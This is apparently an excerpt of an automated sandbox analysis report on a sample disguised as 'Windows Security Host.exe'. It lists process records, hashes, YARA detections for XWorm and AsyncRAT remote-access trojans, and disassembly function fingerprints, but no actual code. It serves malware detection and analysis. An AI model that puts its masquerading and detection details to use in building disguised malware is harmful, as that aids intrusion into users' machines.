                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:34
                                                                                                                                                      Start time:15:20:11
                                                                                                                                                      Start date:14/11/2024
                                                                                                                                                      Path:C:\Users\user\Windows Security Host.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Users\user\Windows Security Host.exe"
                                                                                                                                                      Imagebase:0x8e0000
                                                                                                                                                      File size:81'408 bytes
                                                                                                                                                      MD5 hash:C7BA63CE2ED6D0AAB93AD839E0EDDD68
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\Windows Security Host.exe, Author: Joe Security
                                                                                                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\Windows Security Host.exe, Author: ditekSHen
                                                                                                                                                      Antivirus matches:
                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:35
                                                                                                                                                      Start time:15:20:20
                                                                                                                                                      Start date:14/11/2024
                                                                                                                                                      Path:C:\Users\user\Windows Security Host.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Users\user\Windows Security Host.exe"
                                                                                                                                                      Imagebase:0xef0000
                                                                                                                                                      File size:81'408 bytes
                                                                                                                                                      MD5 hash:C7BA63CE2ED6D0AAB93AD839E0EDDD68
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Disassembly

                                                                                                                                                      Reset < >

                                                                                                                                                        Executed Functions

                                                                                                                                                        Function 00007FFAAC5B0A31 Relevance: .4, Instructions: 403COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1260152635.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ffaac5b0000_8Hd0ZExgJz.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: f650329f753d643096586243d815d1386cf7e3c8435da7ba1a1ee3f27684c59f
                                                                                                                                                        • Instruction ID: 7983eaa5ae6c17416323ceb1b70b4b5bf301168f90fc87dbaeb4b2e584706dc0
                                                                                                                                                        • Opcode Fuzzy Hash: f650329f753d643096586243d815d1386cf7e3c8435da7ba1a1ee3f27684c59f
                                                                                                                                                        • Instruction Fuzzy Hash: FBD1C770A1891A8FEB98EB28C458ABD7BD5FF99311B008679E41ED31D2DE34EC45C780
                                                                                                                                                        Function 00007FFAAC5B12F2 Relevance: 1.8, Strings: 1, Instructions: 508COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1260152635.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ffaac5b0000_8Hd0ZExgJz.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: 88
                                                                                                                                                        • API String ID: 0-364594109
                                                                                                                                                        • Opcode ID: 55900a2fa7e87da95f64bf3d17b8e45544dec54f30323521037c3058166d747f
                                                                                                                                                        • Instruction ID: 9bf52c3d108aee2744d396380eb5f2f3957949a14ae6a3d2fb17c36c7eb50a23
                                                                                                                                                        • Opcode Fuzzy Hash: 55900a2fa7e87da95f64bf3d17b8e45544dec54f30323521037c3058166d747f
                                                                                                                                                        • Instruction Fuzzy Hash: A0811952E5DA468FF798DB7C48597B96FD5FF9A210F08817AE04DC3293ED28980583C1
                                                                                                                                                        Function 00007FFAAC5B04A8 Relevance: 1.5, Strings: 1, Instructions: 273COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1260152635.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ffaac5b0000_8Hd0ZExgJz.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: 88
                                                                                                                                                        • API String ID: 0-364594109
                                                                                                                                                        • Opcode ID: 6fb72e8204cd78db0d950c8e23611c1b9d0439eded1b3aa4fe5006a5afa1c032
                                                                                                                                                        • Instruction ID: f8a6b7b3323ef20b19b6290785eaaff4612f932faa9524de8da811bcf0ef5eb9
                                                                                                                                                        • Opcode Fuzzy Hash: 6fb72e8204cd78db0d950c8e23611c1b9d0439eded1b3aa4fe5006a5afa1c032
                                                                                                                                                        • Instruction Fuzzy Hash: D8711962F1DA0A8BF7D8EB6C88597B96BD5EF99310F04817AE00DC3293ED24980543C1
                                                                                                                                                        Function 00007FFAAC5B03E8 Relevance: 1.3, Strings: 1, Instructions: 79COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1260152635.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ffaac5b0000_8Hd0ZExgJz.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: 3CL_^
                                                                                                                                                        • API String ID: 0-3907758863
                                                                                                                                                        • Opcode ID: f0343eedd99074f5d55bc573d4b68d3609cbad6f5420910aa0d135ab00ba3814
                                                                                                                                                        • Instruction ID: 9522357f10abbbc30702811b4847bd7a0ed348bd928ffb44b5770f654db7cabd
                                                                                                                                                        • Opcode Fuzzy Hash: f0343eedd99074f5d55bc573d4b68d3609cbad6f5420910aa0d135ab00ba3814
                                                                                                                                                        • Instruction Fuzzy Hash: 8C21A196A4E7D29FE356577828250E57FA0DF8724071CC0FBE0CC8A5BBB918D80983C5
                                                                                                                                                        Function 00007FFAAC5B0888 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1260152635.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ffaac5b0000_8Hd0ZExgJz.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: 3CL_^
                                                                                                                                                        • API String ID: 0-3907758863
                                                                                                                                                        • Opcode ID: 621207e3f6bc4056ce55823f62639f523638e482d28b70dd1cf386132700ab4a
                                                                                                                                                        • Instruction ID: 6eee58300bd2896f4cc17ad9fd19cf6c622802a0a0dc75c09a8ac6ac90c5de5c
                                                                                                                                                        • Opcode Fuzzy Hash: 621207e3f6bc4056ce55823f62639f523638e482d28b70dd1cf386132700ab4a
                                                                                                                                                        • Instruction Fuzzy Hash: 3FF0BEA0D4E24386FB583374801A3B96E849F83314F48C5BCF00E4A2C3EE1EE98942C1
                                                                                                                                                        Function 00007FFAAC5B04A0 Relevance: .5, Instructions: 479COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1260152635.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ffaac5b0000_8Hd0ZExgJz.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 3b0848d42e4305921133f92c5d504d8c577569721a7749d163ea6afc24029dcd
                                                                                                                                                        • Instruction ID: 2324b840356a1e931fb09dfc8636852e56eed98fa8e9d74b51976c28fd044ee8
                                                                                                                                                        • Opcode Fuzzy Hash: 3b0848d42e4305921133f92c5d504d8c577569721a7749d163ea6afc24029dcd
                                                                                                                                                        • Instruction Fuzzy Hash: 143166D294EAC39FF35553B4481A5A9AF94FFA3314B0CC1BBD09C464D3FE09A81A82D1
                                                                                                                                                        Function 00007FFAAC5B1079 Relevance: .1, Instructions: 67COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1260152635.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ffaac5b0000_8Hd0ZExgJz.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: df29183f075a9c2be8ff01b2e6ddeae2199305f25e83340b1ee7c2271227ea61
                                                                                                                                                        • Instruction ID: ede80185d4321353cba72996e6336104976de885dcba4442b350a94a8f138f97
                                                                                                                                                        • Opcode Fuzzy Hash: df29183f075a9c2be8ff01b2e6ddeae2199305f25e83340b1ee7c2271227ea61
                                                                                                                                                        • Instruction Fuzzy Hash: 9901DB43F5E98E0FF794937C5856AB57BC9EB97221B4841B6E04DC71D3EC08980543C1
                                                                                                                                                        Function 00007FFAAC5B04B0 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1260152635.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ffaac5b0000_8Hd0ZExgJz.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 77c2c7056988ab67b679cb6d42a92897d552930b2b598ab24be384847b8ecbb8
                                                                                                                                                        • Instruction ID: 4745453ee32298ac25e2d2b2f283b0849cc95c0cde46fa4eff5fbaa51438c286
                                                                                                                                                        • Opcode Fuzzy Hash: 77c2c7056988ab67b679cb6d42a92897d552930b2b598ab24be384847b8ecbb8
                                                                                                                                                        • Instruction Fuzzy Hash: 2701DB23F5A84E4BF7E8667CA859AB977C9EB9B321B504175F00DC3286EC19984543C0
                                                                                                                                                        Function 00007FFAAC5B09C5 Relevance: .0, Instructions: 42COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1260152635.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ffaac5b0000_8Hd0ZExgJz.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 064f7fe57acca9f83bb51196a20933275d9b01cb9686c4217841bd7c71ab4d61
                                                                                                                                                        • Instruction ID: 270929642e7cdb0811e59577b2c4e9544ac2dfc2f5d039d87e2121f9bb640107
                                                                                                                                                        • Opcode Fuzzy Hash: 064f7fe57acca9f83bb51196a20933275d9b01cb9686c4217841bd7c71ab4d61
                                                                                                                                                        • Instruction Fuzzy Hash: 5EF0F6A1A5CB524FF784B72898664793FD0EBD5250B08897AF44DCB2A3ED18D98583C1

                                                                                                                                                        Executed Functions

                                                                                                                                                        Function 00007FFAAC582731 Relevance: 1.6, Strings: 1, Instructions: 336COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1315247551.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac580000_Injector.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: yU_H
                                                                                                                                                        • API String ID: 0-404771944
                                                                                                                                                        • Opcode ID: c07649de8fe8755d514cc850bc22aa7a0e3545250bd93276dde509d26444d6d7
                                                                                                                                                        • Instruction ID: b6bad16a00f1ae538bbce9bcd5daaf2a816a318a18e7db4dd267d7e9f754884e
                                                                                                                                                        • Opcode Fuzzy Hash: c07649de8fe8755d514cc850bc22aa7a0e3545250bd93276dde509d26444d6d7
                                                                                                                                                        • Instruction Fuzzy Hash: 0AA12972E18A494FE754EB2CDC45ABDB7E5EFA9350F4041BAE04EC3242DE24AD4647C1
                                                                                                                                                        Function 00007FFAAC580E30 Relevance: 1.6, Strings: 1, Instructions: 328COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1315247551.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac580000_Injector.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: yU_H
                                                                                                                                                        • API String ID: 0-404771944
                                                                                                                                                        • Opcode ID: 578c754dd540d96f41070b5559af61fb89972f6a2784c62196cf3270d521b677
                                                                                                                                                        • Instruction ID: d6e0ab7c7e41dfa002d7c1ae20a76397c64864c46b09a6e49039c44e582e1c68
                                                                                                                                                        • Opcode Fuzzy Hash: 578c754dd540d96f41070b5559af61fb89972f6a2784c62196cf3270d521b677
                                                                                                                                                        • Instruction Fuzzy Hash: 6BA11872E18A4A4FE764EB2CD845ABDB7E5EFA9350F00417AE04ED3242DE24AD4647C1
                                                                                                                                                        Function 00007FFAAC583EF9 Relevance: .4, Instructions: 377COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1315247551.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac580000_Injector.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: d1d3c79a0c12589f61d56c26f192a7487d02daa256aa132b167a2296231fd082
                                                                                                                                                        • Instruction ID: e2a296c62c3897c7b8447a2bf0a67ce26c50b8faa8655d9836d0d5af9ddf6292
                                                                                                                                                        • Opcode Fuzzy Hash: d1d3c79a0c12589f61d56c26f192a7487d02daa256aa132b167a2296231fd082
                                                                                                                                                        • Instruction Fuzzy Hash: 5AC12771A0D68A8FEB54DB38C8652B97BE1FF56310F04417AE44DC72D2DF28990AC781
                                                                                                                                                        Function 00007FFAAC5810A5 Relevance: .3, Instructions: 307COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1315247551.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac580000_Injector.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: d9660a3735406700f12c44f0aca4445965bcc048bb0c2e7df42f2a5d75d770c7
                                                                                                                                                        • Instruction ID: b557b3bb35ae31badd4f354fb2e3e6d2c23ae9051116301b32fb101161e68832
                                                                                                                                                        • Opcode Fuzzy Hash: d9660a3735406700f12c44f0aca4445965bcc048bb0c2e7df42f2a5d75d770c7
                                                                                                                                                        • Instruction Fuzzy Hash: D8B1D661D4E6878FFB45EB6884112BA3BA5FF87310F0485BAE04D8B1C7CE24E90993D1
                                                                                                                                                        Function 00007FFAAC580E40 Relevance: .3, Instructions: 290COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1315247551.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac580000_Injector.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: ad18655e04daf1c2bbae45cdbe1c8f8d70375f578906c8dad29318f337331a70
                                                                                                                                                        • Instruction ID: 71972dcedd7061ec89603018eb9bf24ab8bbb53e505ae3b239bcae702402a888
                                                                                                                                                        • Opcode Fuzzy Hash: ad18655e04daf1c2bbae45cdbe1c8f8d70375f578906c8dad29318f337331a70
                                                                                                                                                        • Instruction Fuzzy Hash: 15812C31A0CE4A4FE758DB6CD8556B97BE1EFA9351F04827EE04EC3291DE24E8468781
                                                                                                                                                        Function 00007FFAAC5853B5 Relevance: .3, Instructions: 266COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1315247551.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac580000_Injector.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: bae1b5f93977edf3ae6284c8e17af0e2a879300a30dd3763c05ae8372d310c97
                                                                                                                                                        • Instruction ID: 9050b5fb9107dc362625db8de45aafb1adffe6649c6416c69fc682ab99c3c3f0
                                                                                                                                                        • Opcode Fuzzy Hash: bae1b5f93977edf3ae6284c8e17af0e2a879300a30dd3763c05ae8372d310c97
                                                                                                                                                        • Instruction Fuzzy Hash: EB61F07190CB4D8FEB15DF68D8596E9BBF1EF96310F0482ABD04D87152CA34A949CBC2
                                                                                                                                                        Function 00007FFAAC5813ED Relevance: .2, Instructions: 202COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1315247551.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac580000_Injector.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 7b1e8176ce5506975516cc0247ec8545c729ba5c131fc60b326b2fed33e73431
                                                                                                                                                        • Instruction ID: ef6ce6fe0630de20fad4b1235cb13064a7d29c95691869319ff1bcbb73bc339a
                                                                                                                                                        • Opcode Fuzzy Hash: 7b1e8176ce5506975516cc0247ec8545c729ba5c131fc60b326b2fed33e73431
                                                                                                                                                        • Instruction Fuzzy Hash: 7F713E71D0524E8FEB84EBA4C8556FCBBF5FF86310F4045B9E049AB2A2CE786945CB40
                                                                                                                                                        Function 00007FFAAC580E70 Relevance: .2, Instructions: 199COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1315247551.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac580000_Injector.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 3eef28e3a79b1de929bfffb7f12b25771dc882fec4a8d52d43545c26c3fa0e73
                                                                                                                                                        • Instruction ID: 4e263d26fc67adad12d96dfc4735c0a3f5c8a3327be7d9926854631eb19e6e33
                                                                                                                                                        • Opcode Fuzzy Hash: 3eef28e3a79b1de929bfffb7f12b25771dc882fec4a8d52d43545c26c3fa0e73
                                                                                                                                                        • Instruction Fuzzy Hash: F851C571E19A4A8FEF48CB58C8555FE7BE2EF99300F14817AE04DE3282CE34A90597D5
                                                                                                                                                        Function 00007FFAAC580A38 Relevance: .2, Instructions: 159COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1315247551.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac580000_Injector.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: a362d956a874c4c1b0c187d7f1af21023eb9721e30f8f42f02d887619d392ad2
                                                                                                                                                        • Instruction ID: baa5c3a37dd341d9657528dc49f91772d8532550230b9fb237a0472da880c436
                                                                                                                                                        • Opcode Fuzzy Hash: a362d956a874c4c1b0c187d7f1af21023eb9721e30f8f42f02d887619d392ad2
                                                                                                                                                        • Instruction Fuzzy Hash: AB513E70504A4F8FEB84EF58C854ABA73E1FF99301F508A69E42AC7295CB34E955CB80
                                                                                                                                                        Function 00007FFAAC581B55 Relevance: .1, Instructions: 149COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1315247551.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac580000_Injector.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: b2c90459b6ecc8cc6e70afce64a14f8a05ee115dbe45c715c087814d649fba7f
                                                                                                                                                        • Instruction ID: 89c7f77f1cdc7a4a8fc2846bae4e0b7545280c5b61f7d388219dc86edd9f683d
                                                                                                                                                        • Opcode Fuzzy Hash: b2c90459b6ecc8cc6e70afce64a14f8a05ee115dbe45c715c087814d649fba7f
                                                                                                                                                        • Instruction Fuzzy Hash: 0C51757091978A8FEB88CF18C860A753BA1FF5A304F1445ADE45DC72D2CB35E916D781
                                                                                                                                                        Function 00007FFAAC584068 Relevance: .1, Instructions: 143COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1315247551.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac580000_Injector.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 7da074ba844929931a67d2d047b7f44b2a757c45af3bcdb5e4250c7433a4b66b
                                                                                                                                                        • Instruction ID: 84ae00d66f70d26548e17a44bd28ad3869957455049c65cba5c2d11e13605ee1
                                                                                                                                                        • Opcode Fuzzy Hash: 7da074ba844929931a67d2d047b7f44b2a757c45af3bcdb5e4250c7433a4b66b
                                                                                                                                                        • Instruction Fuzzy Hash: 5941B171A0854B8FEB88DF28C8556BA77E1FFA9310F048139E80DD3295DF34D9069B80
                                                                                                                                                        Function 00007FFAAC582A7A Relevance: .1, Instructions: 94COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1315247551.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac580000_Injector.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 3cd6a5638ebe927e869634c9b50c1bd0694956cba98293b65cfcb06373ea7a8b
                                                                                                                                                        • Instruction ID: a09dc17cd4827dd02009d03d2d6f6cc96d728d2c076d3dbd684c04011a923031
                                                                                                                                                        • Opcode Fuzzy Hash: 3cd6a5638ebe927e869634c9b50c1bd0694956cba98293b65cfcb06373ea7a8b
                                                                                                                                                        • Instruction Fuzzy Hash: AF21062055E6C78FE356973888158797FE4EF63221B0541FBE08DC71A2CE18D806C782
                                                                                                                                                        Function 00007FFAAC58164A Relevance: .1, Instructions: 94COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1315247551.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac580000_Injector.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 9a424c689f20a9f8c19a1a9865bfd7b2b2df7d880b72fb0aea7ca86163d6f2fc
                                                                                                                                                        • Instruction ID: 01ed7839d21d967f3f29ee67786d7357b7d789b2f7d322ff8f0cc131b34889b1
                                                                                                                                                        • Opcode Fuzzy Hash: 9a424c689f20a9f8c19a1a9865bfd7b2b2df7d880b72fb0aea7ca86163d6f2fc
                                                                                                                                                        • Instruction Fuzzy Hash: A221F521B5CA4A8FF754A77C941A676B7C5EB8A210F0445FAF00DC7293DD18DD4683D1
                                                                                                                                                        Function 00007FFAAC586D42 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1315247551.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac580000_Injector.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 4ee1225c50ca941342a2242e5bd1c0347054795560a34b63d8f6aec89f0d1587
                                                                                                                                                        • Instruction ID: 273c1ca06b5540f8234e3b115c33c5c72e0e6750f4da496d415450d080f3b84b
                                                                                                                                                        • Opcode Fuzzy Hash: 4ee1225c50ca941342a2242e5bd1c0347054795560a34b63d8f6aec89f0d1587
                                                                                                                                                        • Instruction Fuzzy Hash: 3231742094958A8FF745EB68C455BB9BBE1EF5A300F4444B9E04DC72E3CE28A945D781
                                                                                                                                                        Function 00007FFAAC5807B8 Relevance: .1, Instructions: 85COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1315247551.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac580000_Injector.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 094b6468792f15aac351ab12d3b40883cd9316e42981e2a1ef26acfc18f4181e
                                                                                                                                                        • Instruction ID: fa33cfb3fddf4b17b144f4bea9f40e8bdb62c8c9143dede82bc29325cf71cceb
                                                                                                                                                        • Opcode Fuzzy Hash: 094b6468792f15aac351ab12d3b40883cd9316e42981e2a1ef26acfc18f4181e
                                                                                                                                                        • Instruction Fuzzy Hash: F5110321B18E0E8FF654E72C940AA7AB7C6EB89210F0445BAF00DC3296DD24ED4543D1
